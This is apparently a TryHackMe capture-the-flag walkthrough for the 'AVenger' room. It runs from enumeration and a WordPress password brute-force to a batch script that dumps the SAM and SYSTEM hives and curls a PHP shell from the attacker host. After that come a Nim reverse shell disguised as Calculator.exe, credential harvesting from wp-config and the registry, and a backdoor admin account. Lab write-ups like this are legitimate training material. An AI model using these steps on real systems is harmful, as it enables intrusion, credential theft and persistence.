AVenger
Room Link: https://tryhackme.com/r/room/avenger
Scans
Initial scan
Kali
nmap -A $VICTIM


Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Find Pages
There were too many 404 and 403 in the scan so I changed to ffuf to ignore them.
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 404,403 -e .php,.html,.txt


The gift folder takes us to avenger.tryhackme

Add hostname to host file
Kali
echo $VICTIM avenger.tryhackme >> /etc/hosts
cat /etc/hosts

Kali
ffuf -u http://avenger.tryhackme/gift/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 404,403 -e .php,.html,.txt
Kali
wpscan --url http://avenger.tryhackme/gift --enumerate p

Bruteforce admin page
Kali
wpscan --url http://avenger.tryhackme/gift --passwords /usr/share/wordlists/rockyou.txt
Initial Shell

Kali
git clone https://github.com/flozz/p0wny-shell.git
cd p0wny-shell/
subl exploit.bat
exploit.bat
@echo off
:: Check if the current user is NT AUTHORITY\SYSTEM
whoami /groups | find "S-1-5-18" > nul
if %errorlevel% equ 0 (
:: Run commands for NT AUTHORITY\SYSTEM
reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak
reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak
) else (
:: Run commands for other users
curl http://$KALI:82/shell.php -o C:\xampp\htdocs\shell.php
)
I tried bypassing the file type restriction with the shell above, I could see the bat file running by seeing that it try to grab the shell.php file but I couldn't find a place to save the file where I could also see it on the website.
Kali
python2 -m SimpleHTTPServer 82

Nim reverse shell worked because they accept exe files
Kali
git clone https://github.com/Sn1r/Nim-Reverse-Shell.git
cd Nim-Reverse-Shell/
apt install mingw-w64 -y
Kali
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
Kali
subl rev_shell.nim

Kali #1
/root/.nimble/bin/nim c -d:mingw --app:gui --opt:speed -o:Calculator.exe rev_shell.nim


Kali #2
rlwrap nc -lvnp 443

Privilege Esclation
Found some credentials.
Victim
type C:\xampp\htdocs\gift\wp-config.php

From my computer I could access the mysql.
Kali
apt install mysql-client-core-5.7
mysql -h$VICTIM -ugift -pSurpriseMF
I was able to find a password but couldn't crack it
Kali(mysql)
select * from mysql -h$VICTIM -ugift -pSurpriseMF
use gift;
show tables;
select * from wp_users;

I found a password
Victim
reg query HKLM /f password /t REG_SZ /s

Kali
remmina
Username: hugo
Password: SurpriseMF123!

I can run a administrator shell from the GUI


Victim
net user backdoor pass!123 /add
net localgroup Administrators "Remote Desktop Users" backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f
Kali
remmina
Username: backdoor
Password: pass!123

Last updated